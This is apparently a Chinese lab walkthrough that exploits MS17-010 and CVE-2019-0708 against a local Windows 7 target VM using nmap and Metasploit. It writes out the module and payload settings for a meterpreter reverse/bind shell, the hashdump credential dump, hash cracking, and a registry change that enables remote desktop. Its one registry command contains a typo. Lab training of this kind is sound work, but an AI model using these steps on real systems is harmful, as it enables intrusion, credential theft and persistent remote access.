环境搭建
kali windows 7 sp 1:链接:https://pan.baidu.com/s/1AdimIwMPdg8Wf8FUeJbx2w?pwd=jfgh win7的登录账号和密码为root:root 注意:如果nmap扫描不出东西,请登录到win7关闭它的防火墙 先让靶机与kali处于同一个网段 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2faa0fc2d955405d8c538370c296d8f7.png)
一、ms17-010漏洞利用
1.信息收集
ip add #查看kali的ip地址
![在这里插入图片描述](https://img-blog.csdnimg.cn/3414d01949844440bb6fdae5248c6b34.png)
arp-scan -l #查看局域网中所有ip
得到靶机ip为10.10.10.141 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f1a81e42508448cc9c40f9a81ac40cdb.png)
nmap -A -sV 10.10.10.141 #扫描靶机的所有信息和版本信息
得到靶机操作系统为Windows7 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fa7fd9bd22194792bcb9abce7d80bc26.png)
nmap --script=vuln 10.10.10.141 #使用namp对靶机进行已知漏洞探测
#--script可以指定脚本
#vuln脚本包含了许多已知漏洞
我们可以知道靶机存在ms17-010漏洞 ![在这里插入图片描述](https://img-blog.csdnimg.cn/ecaa9ef94407469ebebea86cb4354ec9.png)
2.漏洞利用
msfconsole #开启msf
![在这里插入图片描述](https://img-blog.csdnimg.cn/713c49343a4141cdbd436b62da9a3297.png)
search ms17-010 #查找ms17-010相关模块
在前面信息收集中,我们可以知道靶机开放了445端口存在smb服务,且靶机是Windows系统,使用我们使用id为0的攻击模块
use 0 #使用模块
show missing #查看必须配置的参数
set rhosts 10.10.10.141 #配置靶机IP
主要的配置完了,我们查看全部配置参数,来设置payload模块和target模块
show options #查看所有配置参数
![在这里插入图片描述](https://img-blog.csdnimg.cn/41276084ff17490ab0767c1570737264.png)
show payloads #查看payload模块
我们知道靶机是Windows系统,我们需要靶机反向TCP连接。
set payload/windows/x64/meterpreter/reverse_tcp
# meterpreter是一种在目标系统上实现远程控制和管理功能强大的后门工具。
# reverse_tcp 反向TCP连接
![在这里插入图片描述](https://img-blog.csdnimg.cn/ddd7a7c443a846d8a2b5636253a39670.png)
set payload 31 #就是使用payload/windows/x64/meterpreter/reverse_tcp
#31 是模块对应的数字
设置靶机的系统版本,我们在前面已经知道靶机是windows7了 直接设置target。然后开始攻击 进入shell ![在这里插入图片描述](https://img-blog.csdnimg.cn/e52fd3180cbc4f109dc518f47c07069d.png)
hashdump #获取所有用户的密码
这个密码都是被进行了加密。 md5在线解密:https://www.cmd5.com/default.aspx 直接解密root用户的密码,得到root用户的密码为root ![在这里插入图片描述](https://img-blog.csdnimg.cn/891d78f219db4670bffe098bdb3d11dc.png)
REG ADD HKLE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal: 这是用于添加(或修改)注册表键值的命令,其中HKLM\SYSTEM\CurrentControlSet\Control\Terminal是注册表的路径,表示要修改的注册表项的位置。
#/v fDenyTSConnections: 这是指定要添加(或修改)的注册表项的名称,fDenyTSConnections是要修改的注册表项的名称。
#/t REG_DWORD: 这是指定要添加的数据类型,REG_DWORD表示这是一个32位的DWORD值。
#/d 00000000: 这是指定要添加(或修改)的值,00000000表示开启远程终端服务连接。
#/f: 这是一个强制选项,表示在遇到任何错误时都应强制执行操作。
netstat -an #查看靶机开放的端口
![在这里插入图片描述](https://img-blog.csdnimg.cn/67cdf21ee8664270b5a22ecc7c964d04.png)
rdesktop 10.10.10.141 #远程到靶机
![在这里插入图片描述](https://img-blog.csdnimg.cn/6b9e6567d37f43f88d0cebbdd38442d7.png)
二、CVE-2019-0708漏洞利用
nmap -sV -Pn 10.10.10.141
#-sV 版本检测
#-Pn no ping扫描
发现已经开放了远程桌面服务 用nessus扫描靶机得到CVE-2019-0708漏洞 ![在这里插入图片描述](https://img-blog.csdnimg.cn/d36e6a49e02a48ccaacdf33dfe8ddeb0.png)
msfconsole #开启msf
search CVE-2019-0708 #寻找相关漏洞模块
得到auxiliary(辅助模块)exploit(攻击模块),先使用辅助模块判断漏洞是否存在 发现存在漏洞后,使用攻击模块 ![在这里插入图片描述](https://img-blog.csdnimg.cn/be986d1cfc3241638a07eaeba3010afb.png)
set rhosts 10.10.10.141 #设置靶机ip
set payload windows/x64/meterpreter/bind_tcp #使用反向tcp连接的攻击payload
set target 5 #通过实际情况选择
run # 攻击
得到shell =--------------------------------------------------------------------------------------------------------------------= 总结 漏洞利用的一般步骤: 1.信息收集获取靶机的ip,系统版本,开放端口,可能存在漏洞 2.用msf使用漏洞,设置相应的pyload,target,最后开始攻击
|